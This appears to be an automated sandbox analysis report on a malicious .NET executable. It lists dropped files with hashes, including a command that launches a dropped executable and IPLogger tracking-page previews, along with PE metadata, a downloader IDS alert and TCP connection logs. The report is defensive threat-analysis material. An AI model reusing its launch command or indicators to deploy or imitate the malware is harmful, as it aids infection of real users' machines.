                          SHA-256:491A499F56A876693081261AE072BEF63398C2A520FF036BF5157C68E3A38FE6
                          SHA-512:70665C9265CE04FEF714A42EE6E9A19D0DA34502BC60C3E78564827ADE30EAE1F0A04B174F17F7A6E9EF1E592AA5668024CBC7445C0A2C117C716A279FF139C3
                          Malicious:true
                          Preview:start "" "C:\Users\user\AppData\Local\ervnd6hdsvGTxZRjT5cWwm7U.exe"

                          C:\Users\user\Pictures\JZcYBNj1ubLNiJw9f2J4pNN0.exe

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                          Category:dropped
                          Size (bytes):7462
                          Entropy (8bit):5.420482116403958
                          Encrypted:false
                          SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                          MD5:77F762F953163D7639DFF697104E1470
                          SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                          SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                          SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                          Malicious:false
                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                          C:\Users\user\Pictures\pMkw4TisYGbRi255aTHnqU3d.exe

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                          Category:dropped
                          Size (bytes):7462
                          Entropy (8bit):5.420482116403958
                          Encrypted:false
                          SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                          MD5:77F762F953163D7639DFF697104E1470
                          SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                          SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                          SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                          Malicious:false
                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                          C:\Windows\appcompat\Programs\Amcache.hve

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.369394524839761
                          Encrypted:false
                          SSDEEP:6144:aFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:SV1QyWWI/glMM6kF7/q
                          MD5:049AAE71C0CC2BC4F8C34712F694768A
                          SHA1:02B2EEF0BA8114CD0A43F885F90058CCD9150D6D
                          SHA-256:D5CE4E1C02D82353C3D416384E6650A5F438CF1567DEF31B4B83D12C649F2EE7
                          SHA-512:4AA0F2A450F712A63023014E7905D93A3145A6EAF93299D27526C9EDEF3B7DD6F2ACA3F5C174F687ED69BA6284088F5F98809CF5F4795D663BC9BBAEFED28C1C
                          Malicious:false
                          Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.8.N...............................................................................................................................................................................................................................................................................................................................................&g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):6.311386649744225
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          • Win32 Executable (generic) a (10002005/4) 49.97%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:20'133'888 bytes
                          MD5:f1c717609dd44f9e2c979fd9a0f4315c
                          SHA1:efcca65af18339bc8954c12a486f0a0828a981fa
                          SHA256:9b2e59478ea4738cc23cdba5d1b9111c636410661a7a4592c35144de94b8c8ad
                          SHA512:9dabafadb586444a0a8cc47c8d07c1b8a0f353d8e1aaf91cfe849bd15082ee417bb1688659fdea07be5d0a0bb8582ad1680b566884b7d980d1ef182ecfcfc709
                          SSDEEP:196608:rQ1jHTLbCANqFw3BWc3OnVTA9SnkH/GnXWxfJRjMJIO065bJWfVaTQHa1B:rQ1H3RcSBWc3OnVFkeXWBQh333Q61B
                          TLSH:EB1712277CC37099D529A9FD6A3796DCB3E62BCB57010A3CF296430EC61092F7794222
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.P.................03..........M3.. ...`3...@.. ........................3...........`................................

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x1734dfe
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x50013911 [Sat Jul 14 09:17:05 2012 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:v4.0.30319
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1334dac0x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x13360000x3fc.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x13380000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x1332e040x13330002e0b3f85e5c17fcf2c88edb214c0080bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x13360000x3fc0x400e33494fd5c662dd662c3f43e51fc5e48False0.4267578125data3.504747656785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x13380000xc0x200f1bfdb08e7eb3b8df09c59a9104af72bFalse0.041015625data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0x13360580x3a4data0.43240343347639487

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-09-12T22:01:54.502289+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849728172.67.19.24443TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 12, 2024 22:01:17.554614067 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:17.554673910 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:17.554759979 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:17.568006039 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:17.568048000 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.037111044 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.037216902 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.039506912 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.039541006 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.039923906 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.087858915 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.100549936 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.143410921 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222090006 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222151041 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222194910 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222214937 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.222227097 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222239971 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222305059 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.222335100 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222359896 CEST44349715104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:18.222399950 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.222428083 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.236726046 CEST49715443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:18.384876966 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:18.384934902 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:18.384996891 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:18.385380030 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:18.385397911 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:18.848701000 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:18.848773956 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:18.850608110 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:18.850620031 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:18.850868940 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:18.852442980 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:18.895407915 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.340800047 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.340847969 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.340876102 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.340924025 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.340940952 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:19.340969086 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.341029882 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:19.341571093 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.341608047 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.341697931 CEST44349716188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:19.341736078 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:19.341736078 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:19.342217922 CEST49716443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:23.667695999 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:23.667737961 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:23.667897940 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:23.668148041 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:23.668159008 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.276962996 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.278889894 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:24.278911114 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.430789948 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.430851936 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.430903912 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.430932999 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.431009054 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:24.431013107 CEST44349717104.20.4.235192.168.2.8
                          Sep 12, 2024 22:01:24.431065083 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:24.431065083 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:24.431934118 CEST49717443192.168.2.8104.20.4.235
                          Sep 12, 2024 22:01:24.506344080 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:24.506417990 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:24.506644964 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:24.506838083 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:24.506851912 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:24.992873907 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:24.994684935 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:24.994728088 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.227902889 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.227957964 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.227988005 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.228009939 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.228034019 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.228030920 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:25.228064060 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.228091002 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.228116035 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:25.228116035 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:25.228188038 CEST44349718188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:25.228233099 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:25.229444027 CEST49718443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:29.628679037 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:29.628730059 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:29.628817081 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:29.629102945 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:29.629115105 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.117820024 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.120085955 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:30.120105028 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266011000 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266072989 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266113043 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266133070 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:30.266155005 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266191959 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:30.266196966 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266256094 CEST44349719172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:30.266297102 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:30.266685009 CEST49719443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:30.314861059 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:30.314922094 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:30.314996004 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:30.315296888 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:30.315309048 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:30.791780949 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:30.793399096 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:30.793427944 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033606052 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033685923 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033726931 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033744097 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:31.033766031 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033803940 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:31.033811092 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033855915 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033890963 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033900976 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:31.033906937 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033945084 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:31.033951044 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.033993959 CEST44349720188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:31.034033060 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:31.074503899 CEST49720443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:35.336286068 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.336354971 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.336447954 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.336771011 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.336792946 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.817092896 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.817236900 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.819050074 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.819061041 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.819318056 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.820559978 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.863408089 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945030928 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945297003 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945384026 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945384026 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.945462942 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945521116 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.945540905 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945619106 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945678949 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.945697069 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945800066 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.945852041 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.945867062 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.949723005 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.949796915 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.949801922 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:35.949824095 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:35.949877977 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:36.033097029 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:36.033463955 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:36.033543110 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:36.033584118 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:36.033721924 CEST44349721104.21.76.57192.168.2.8
                          Sep 12, 2024 22:01:36.033787012 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:36.033991098 CEST49721443192.168.2.8104.21.76.57
                          Sep 12, 2024 22:01:36.150619030 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.150666952 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.150743961 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.151125908 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.151138067 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.634845972 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.637248993 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.637273073 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.783037901 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.783087015 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.783123016 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.783149004 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.783236027 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.783243895 CEST44349722172.67.19.24192.168.2.8
                          Sep 12, 2024 22:01:36.783328056 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.783328056 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:36.876909018 CEST49722443192.168.2.8172.67.19.24
                          Sep 12, 2024 22:01:37.101588011 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:37.101627111 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.101708889 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:37.101928949 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:37.101937056 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.565918922 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.567665100 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:37.567686081 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.800787926 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.800844908 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.800874949 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.800906897 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.800935984 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.800986052 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.801019907 CEST49723443192.168.2.8188.114.96.3
                          Sep 12, 2024 22:01:37.801044941 CEST44349723188.114.96.3192.168.2.8
                          Sep 12, 2024 22:01:37.801068068 CEST49723443192.168.2.8188.114.96.3
